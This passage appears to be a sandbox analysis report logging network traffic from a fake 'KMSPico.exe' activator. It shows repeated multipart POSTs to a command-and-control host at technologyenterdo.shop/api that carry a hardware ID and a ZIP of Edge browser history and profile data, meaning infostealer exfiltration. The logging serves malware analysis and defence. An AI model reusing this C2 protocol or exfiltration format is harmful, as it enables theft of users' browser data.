                                    Data Ascii: kL8LlfDxFg+gBHU1LJrXynT2wXBrvfw1pCN/zagC4VJCHwuV8PTGzXKkUWCMu3fP4KB0FH89+0Gw57u8vMASUkI7/6FUtBLbVBCVpFjPo252ViBgG6lvVUSCvxzMhEfGxp8rVyJRFg+gBFFgjLtTn/JTdBRYCK/Rt5OvXCx1c9CQvwuV8PEWCnDGg8CMu3fKUndmxt89+0Gw57uY6ARnEmO/C7EEVWJ7dDDVpPg/k26WZ9DAGxkf5TQTf/xMlKd
                                    2024-02-29 00:47:54 UTC1369INData Raw: 35 58 77 38 52 59 50 6f 41 52 31 4e 47 79 61 31 38 70 32 5a 72 41 77 53 78 6c 65 52 5a 58 6a 33 34 79 73 35 49 63 6d 78 73 73 2f 55 58 52 46 51 6c 74 55 51 49 56 30 57 49 38 54 44 6d 4a 53 46 73 62 66 50 66 74 42 73 4f 65 37 6d 4f 67 45 5a 6c 4a 6a 76 77 75 7a 4a 4f 52 53 6a 34 4c 57 38 57 43 4d 75 33 66 4b 56 36 49 57 78 74 38 39 2b 30 47 77 35 37 34 71 4f 6f 41 7a 38 6b 49 66 43 35 58 77 38 54 4a 62 51 43 58 78 59 4b 67 2f 6b 36 35 47 6c 6d 44 77 69 77 6d 66 46 55 53 44 6e 39 79 73 56 41 64 6d 35 76 76 66 45 52 53 56 38 72 76 6b 34 45 56 30 7a 4a 75 31 47 50 4a 79 31 42 52 2f 50 66 74 42 73 4d 50 75 4f 4d 6d 41 4d 39 52 32 36 35 39 78 31 4f 51 69 58 34 4c 57 38 57 43 4d 75 33 66 4b 56 36 49 57 78 74 38 39 2b 30 47 77 35 37 34 71 4f 6f 41 7a 38 6b 49 66
                                    Data Ascii: 5Xw8RYPoAR1NGya18p2ZrAwSxleRZXj34ys5Icmxss/UXRFQltUQIV0WI8TDmJSFsbfPftBsOe7mOgEZlJjvwuzJORSj4LW8WCMu3fKV6IWxt89+0Gw574qOoAz8kIfC5Xw8TJbQCXxYKg/k65GlmDwiwmfFUSDn9ysVAdm5vvfERSV8rvk4EV0zJu1GPJy1BR/PftBsMPuOMmAM9R2659x1OQiX4LW8WCMu3fKV6IWxt89+0Gw574qOoAz8kIf
                                    2024-02-29 00:47:54 UTC1369INData Raw: 45 57 44 36 41 45 56 4e 4a 65 47 33 66 4b 55 6e 4c 55 46 48 38 39 33 78 56 51 78 68 75 59 7a 4d 53 48 74 67 5a 72 37 36 47 30 56 57 4b 72 78 44 41 56 4a 4a 68 76 45 37 35 6d 70 72 44 77 75 37 6e 50 64 56 52 7a 62 77 79 59 41 50 45 67 34 68 38 4c 6c 66 44 78 46 67 2b 67 49 41 54 41 72 52 74 33 37 57 5a 6e 6b 55 46 62 33 64 6d 54 45 4f 65 37 6d 4f 67 67 4e 69 4b 41 7a 61 75 56 38 50 45 57 44 36 57 32 67 38 43 4d 75 33 66 4b 55 6e 4c 55 46 46 74 70 47 32 41 51 35 35 2b 74 37 4b 53 33 4e 6a 62 4c 66 34 45 6b 70 65 4a 4c 52 49 44 6c 78 4d 68 76 77 73 35 47 6c 68 42 41 75 39 6b 2f 74 54 54 7a 53 37 67 71 38 70 50 79 51 68 38 4c 6c 66 44 78 46 69 76 31 70 48 44 41 6a 4a 32 54 6e 71 53 32 51 50 41 76 48 79 6e 68 73 4f 65 37 6d 4f 67 6c 34 7a 43 51 76 77 75 56 38
                                    Data Ascii: EWD6AEVNJeG3fKUnLUFH893xVQxhuYzMSHtgZr76G0VWKrxDAVJJhvE75mprDwu7nPdVRzbwyYAPEg4h8LlfDxFg+gIATArRt37WZnkUFb3dmTEOe7mOggNiKAzauV8PEWD6W2g8CMu3fKUnLUFFtpG2AQ55+t7KS3NjbLf4EkpeJLRIDlxMhvws5GlhBAu9k/tTTzS7gq8pPyQh8LlfDxFiv1pHDAjJ2TnqS2QPAvHynhsOe7mOgl4zCQvwuV8
                                    2024-02-29 00:47:54 UTC1369INData Raw: 67 42 46 46 67 6a 4c 74 33 37 67 61 53 39 62 52 2f 47 5a 2f 46 6c 42 4d 2f 44 44 77 30 5a 7a 5a 6d 36 34 36 52 56 4e 55 79 79 2b 51 77 74 52 53 34 58 32 4c 4f 74 6a 59 67 55 4e 6f 39 32 34 4e 69 52 37 75 59 36 43 41 7a 38 6b 49 66 4c 38 42 51 30 4c 59 50 68 69 44 46 68 4a 68 66 51 35 30 6d 5a 68 44 51 4b 6e 33 5a 6b 78 44 6e 75 35 6a 6f 49 44 59 69 67 49 33 5a 4e 32 44 78 45 37 31 79 70 46 46 67 6a 4c 74 33 79 6c 4a 79 38 45 43 66 48 46 74 42 6c 42 4e 66 48 42 78 55 56 31 59 57 43 7a 39 78 6c 41 58 69 61 78 52 67 4a 47 57 49 2f 37 50 75 68 72 59 41 38 58 76 35 6a 32 56 51 78 33 6c 4b 53 43 41 7a 38 6b 49 66 43 35 58 77 31 55 4f 76 67 61 52 52 52 37 6e 76 56 2b 69 41 30 74 51 55 66 7a 33 37 52 47 41 6c 4b 55 70 4b 38 70 46 69 51 68 71 35 52 31 44 78 46 67
                                    Data Ascii: gBFFgjLt37gaS9bR/GZ/FlBM/DDw0ZzZm646RVNUyy+QwtRS4X2LOtjYgUNo924NiR7uY6CAz8kIfL8BQ0LYPhiDFhJhfQ50mZhDQKn3ZkxDnu5joIDYigI3ZN2DxE71ypFFgjLt3ylJy8ECfHFtBlBNfHBxUV1YWCz9xlAXiaxRgJGWI/7PuhrYA8Xv5j2VQx3lKSCAz8kIfC5Xw1UOvgaRRR7nvV+iA0tQUfz37RGAlKUpK8pFiQhq5R1DxFg
                                    2024-02-29 00:47:54 UTC1369INData Raw: 52 70 6e 75 55 7a 70 77 6f 48 51 55 66 7a 33 37 51 62 55 33 65 55 70 49 49 44 50 79 51 68 38 4f 4a 79 4a 52 46 67 2b 67 42 46 46 67 6a 4c 74 54 6e 72 4a 54 64 42 52 62 6d 51 2f 6c 4e 49 50 76 62 4c 78 6b 68 76 62 32 61 38 2b 78 6c 47 58 43 53 38 51 51 64 47 54 49 33 39 50 65 70 6f 59 51 41 42 38 64 4f 5a 4d 51 35 37 75 59 36 43 41 7a 38 6b 49 37 58 6a 58 52 55 52 59 6f 70 50 43 55 39 46 6a 75 51 30 70 77 6f 48 51 55 66 7a 33 37 51 62 55 33 65 55 70 49 49 44 50 79 51 68 38 4f 4a 79 4a 52 46 67 2b 67 42 46 46 67 6a 4c 74 54 6e 72 4a 54 64 42 52 62 57 54 35 46 4a 4e 4d 76 44 43 78 30 35 34 62 47 4f 39 2f 78 35 44 57 43 4f 37 53 67 70 5a 52 49 50 38 4e 2b 42 70 61 77 52 46 2f 2f 4b 65 47 77 35 37 75 59 36 43 41 7a 38 6d 5a 4b 71 37 52 51 38 54 43 5a 6c 76 4b
                                    Data Ascii: RpnuUzpwoHQUfz37QbU3eUpIIDPyQh8OJyJRFg+gBFFgjLtTnrJTdBRbmQ/lNIPvbLxkhvb2a8+xlGXCS8QQdGTI39PepoYQAB8dOZMQ57uY6CAz8kI7XjXRURYopPCU9FjuQ0pwoHQUfz37QbU3eUpIIDPyQh8OJyJRFg+gBFFgjLtTnrJTdBRbWT5FJNMvDCx054bGO9/x5DWCO7SgpZRIP8N+BpawRF//KeGw57uY6CAz8mZKq7RQ8TCZlvK
                                    2024-02-29 00:47:54 UTC1369INData Raw: 6e 66 71 6b 4b 42 30 46 48 38 39 2b 30 47 77 35 37 75 38 76 59 41 53 55 6b 49 35 6a 67 48 45 42 66 59 4a 5a 4a 45 56 4d 49 71 50 73 31 34 47 6c 35 51 32 72 5a 33 37 51 62 44 6e 75 35 30 34 34 75 46 53 51 68 38 4c 6c 66 44 30 70 4e 30 41 42 46 46 67 6a 4c 74 33 79 6c 4a 57 67 50 52 65 6e 66 74 6c 42 43 4e 66 6a 4c 79 45 6c 34 5a 6d 69 79 39 42 64 44 56 44 43 79 54 67 31 47 52 59 72 34 4f 75 70 76 61 67 6f 58 74 4a 54 77 47 51 4a 57 6b 34 36 43 41 7a 38 6b 49 66 43 35 58 55 70 4c 59 75 41 41 52 32 78 42 68 38 63 39 2f 43 55 41 61 30 66 7a 33 37 51 62 44 69 61 31 6f 36 67 44 50 79 51 68 38 4c 6b 45 49 6a 74 67 2b 67 42 46 46 67 6a 4c 74 33 37 67 61 53 39 62 52 2f 47 65 38 56 70 4e 4d 2f 4c 41 7a 30 5a 35 64 47 6d 31 36 52 78 4d 57 43 2b 30 51 67 70 5a 51 49
                                    Data Ascii: nfqkKB0FH89+0Gw57u8vYASUkI5jgHEBfYJZJEVMIqPs14Gl5Q2rZ37QbDnu5044uFSQh8LlfD0pN0ABFFgjLt3ylJWgPRenftlBCNfjLyEl4Zmiy9BdDVDCyTg1GRYr4OupvagoXtJTwGQJWk46CAz8kIfC5XUpLYuAAR2xBh8c9/CUAa0fz37QbDia1o6gDPyQh8LkEIjtg+gBFFgjLt37gaS9bR/Ge8VpNM/LAz0Z5dGm16RxMWC+0QgpZQI
                                    2024-02-29 00:47:54 UTC1369INData Raw: 63 32 55 59 52 64 37 31 74 42 73 4f 65 37 6d 4f 33 77 38 53 44 69 48 77 75 56 38 50 45 54 76 58 4b 6b 55 57 43 4d 75 33 66 4b 55 6e 4c 77 51 4a 38 63 57 30 47 55 45 2b 39 63 54 47 54 33 74 30 62 37 33 39 48 55 78 5a 4c 37 52 4a 41 46 70 42 6a 2f 41 7a 35 32 4e 70 42 77 47 31 6b 2f 55 5a 41 6c 61 54 6a 6f 49 44 50 79 51 68 38 4c 6c 64 53 6b 74 69 34 41 42 48 63 32 65 34 74 78 33 77 63 32 55 45 43 61 65 57 39 31 70 61 4e 4f 75 4d 72 79 6b 2f 4a 43 48 77 75 56 39 53 48 55 33 51 41 45 55 57 43 4d 75 33 4a 34 67 4e 4c 55 46 48 38 39 2b 30 47 77 35 35 2f 4d 43 41 47 54 38 6d 61 4c 7a 2b 48 45 46 5a 4a 62 5a 51 42 6c 35 47 69 50 49 35 37 48 64 6b 45 51 36 35 6e 76 68 52 52 54 6e 31 7a 4d 46 4d 66 53 59 74 33 5a 4e 66 44 78 46 67 2b 67 42 46 46 67 71 4f 37 58 36
                                    Data Ascii: c2UYRd71tBsOe7mO3w8SDiHwuV8PETvXKkUWCMu3fKUnLwQJ8cW0GUE+9cTGT3t0b739HUxZL7RJAFpBj/Az52NpBwG1k/UZAlaTjoIDPyQh8LldSkti4ABHc2e4tx3wc2UECaeW91paNOuMryk/JCHwuV9SHU3QAEUWCMu3J4gNLUFH89+0Gw55/MCAGT8maLz+HEFZJbZQBl5GiPI57HdkEQ65nvhRRTn1zMFMfSYt3ZNfDxFg+gBFFgqO7X6


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.549706104.21.80.1184433648C:\Users\user\Desktop\KMSPico.exe
                                    TimestampBytes transferredDirectionData
                                    2024-02-29 00:47:54 UTC288OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 13678
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:47:54 UTC13678OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 37 42 33 41 39 38 36 36 41 39 39 35 30 42 30 35 45 44 37 45 30 41 46 35 33 38 46 32 43 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 54 7a 70 32 63 71 2d 2d 4b 4d 53 0d 0a
                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"827B3A9866A9950B05ED7E0AF538F2C5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Tzp2cq--KMS
                                    2024-02-29 00:47:55 UTC804INHTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:47:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=3s082lojd91cbuhvuhro4eu0ln; expires=Sun, 23-Jun-2024 18:34:34 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6S9fPQHUxG4oLi1lWBDBegaFp5ZHJ3hVmVlML0HiY0TgPsc4sg2St75%2FJ5ljns7nK6FxwJQ9UYpOWCl66spe6V4g%2FJjxAesPo0g1tPcoNHwYjfNJ3rj7r6nUR%2FTi789xPuyfDxRwT7w5"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce610fd7f1977-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-02-29 00:47:55 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 0d 0a
                                    Data Ascii: 11ok 191.96.227.215
                                    2024-02-29 00:47:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.549707104.21.80.1184433648C:\Users\user\Desktop\KMSPico.exe
                                    TimestampBytes transferredDirectionData
                                    2024-02-29 00:47:56 UTC288OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 16221
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:47:56 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 37 42 33 41 39 38 36 36 41 39 39 35 30 42 30 35 45 44 37 45 30 41 46 35 33 38 46 32 43 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 54 7a 70 32 63 71 2d 2d 4b 4d 53 0d 0a
                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"827B3A9866A9950B05ED7E0AF538F2C5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Tzp2cq--KMS
                                    2024-02-29 00:47:56 UTC890OUTData Raw: 22 00 01 01 1a 6c 65 76 65 6c 64 62 2e 42 79 74 65 77 69 73 65 43 6f 6d 70 61 72 61 74 6f 72 02 00 03 02 04 00 50 4b 07 08 a0 1c 50 7b 2e 00 00 00 29 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 18 4d 89 51 12 00 00 00 0d 00 00 00 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 64 67 65 2f 42 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 1f 06 f1 34 25 00 00 00 20 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 57 00 00 00 45 64 67 65 2f 64 70 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 7f 06 10 18 41 0b 00 00 00 60 02 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 b5 00 00 00 45 64 67 65 2f 44 65 66 61 75 6c 74 2f 48 69 73 74 6f 72 79 50 4b 01 02 00 00 14 00 08 08
                                    Data Ascii: "leveldb.BytewiseComparatorPKP{.)PKMQEdge/BrowserVersion.txtPK4% WEdge/dp.txtPKA`Edge/Default/HistoryPK
                                    2024-02-29 00:47:56 UTC808INHTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:47:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=aniec5svtejh9ut864vghagt6a; expires=Sun, 23-Jun-2024 18:34:35 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LnNojuVH7%2F1TTgP3w3Ft0f0bvy%2F9Zu4NNqGIkBoiyS2EPxaO5rYwyTWoA0wYXQ0DP4Mr%2FqXSM%2B0Va%2BqeSfI6v3MJ8iwq0qlfIlyYynmwGnS6kYv1vVdAmHdDYMmjUhKCJKy8Yzblimis"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce6176e117ca5-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-02-29 00:47:56 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 0d 0a
                                    Data Ascii: 11ok 191.96.227.215
                                    2024-02-29 00:47:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.549708104.21.80.1184433648C:\Users\user\Desktop\KMSPico.exe
                                    TimestampBytes transferredDirectionData
                                    2024-02-29 00:47:56 UTC288OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 20565
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:47:56 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 37 42 33 41 39 38 36 36 41 39 39 35 30 42 30 35 45 44 37 45 30 41 46 35 33 38 46 32 43 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 54 7a 70 32 63 71 2d 2d 4b 4d 53 0d 0a
                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"827B3A9866A9950B05ED7E0AF538F2C5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Tzp2cq--KMS
                                    2024-02-29 00:47:56 UTC5234OUTData Raw: cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb
                                    Data Ascii: 6vMMZh'F3Wun 4F([:7s~X`nO
                                    2024-02-29 00:47:57 UTC810INHTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:47:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=dkqg73hcobsr6g3la8pfr55ug1; expires=Sun, 23-Jun-2024 18:34:36 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WAdWd58A8bbQkqpYc3Spjv6jLJ8NVSSnFL9zKc6SjMOx4WBjLxcrZX%2F8%2BWL4YjjjJvvMXQ8hbehUvGxCGu1SBwzCgyQn8%2BUuE%2BEFDmcHLlsQgaQgJN%2BwJdM5rS0MQ7Mk9%2F96KtYLU7xB"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce61d6c1d0f4d-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-02-29 00:47:57 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 0d 0a
                                    Data Ascii: 11ok 191.96.227.215
                                    2024-02-29 00:47:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.549709104.21.80.1184433648C:\Users\user\Desktop\KMSPico.exe
                                    TimestampBytes transferredDirectionData
                                    2024-02-29 00:47:59 UTC287OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 7086
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:47:59 UTC7086OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 37 42 33 41 39 38 36 36 41 39 39 35 30 42 30 35 45 44 37 45 30 41 46 35 33 38 46 32 43 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 54 7a 70 32 63 71 2d 2d 4b 4d 53 0d 0a
                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"827B3A9866A9950B05ED7E0AF538F2C5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Tzp2cq--KMS
                                    2024-02-29 00:48:00 UTC806INHTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:48:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=132oosr83gmsme7lob4posfuo0; expires=Sun, 23-Jun-2024 18:34:38 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RNKmnAm7DZxuIMNcVi0K7d1R2%2FaYVl5L%2FNOVnOv%2B1RSYjpcDxvAZtpaimVZwy2LcdNEJAjyDeIetja6GW%2BGH2ACEVlRCjeidwHRxbJxnpDZsxjheneWzYp0sBC1ZrbIzL9gtQOCn63Fo"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce62ded4b6a50-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-02-29 00:48:00 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 0d 0a
                                    Data Ascii: 11ok 191.96.227.215
                                    2024-02-29 00:48:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.549710104.21.80.1184433648C:\Users\user\Desktop\KMSPico.exe
                                    TimestampBytes transferredDirectionData
                                    2024-02-29 00:48:00 UTC287OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 1256
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:48:00 UTC1256OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 37 42 33 41 39 38 36 36 41 39 39 35 30 42 30 35 45 44 37 45 30 41 46 35 33 38 46 32 43 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 54 7a 70 32 63 71 2d 2d 4b 4d 53 0d 0a
                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"827B3A9866A9950B05ED7E0AF538F2C5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Tzp2cq--KMS
                                    2024-02-29 00:48:00 UTC806INHTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:48:00 GMT
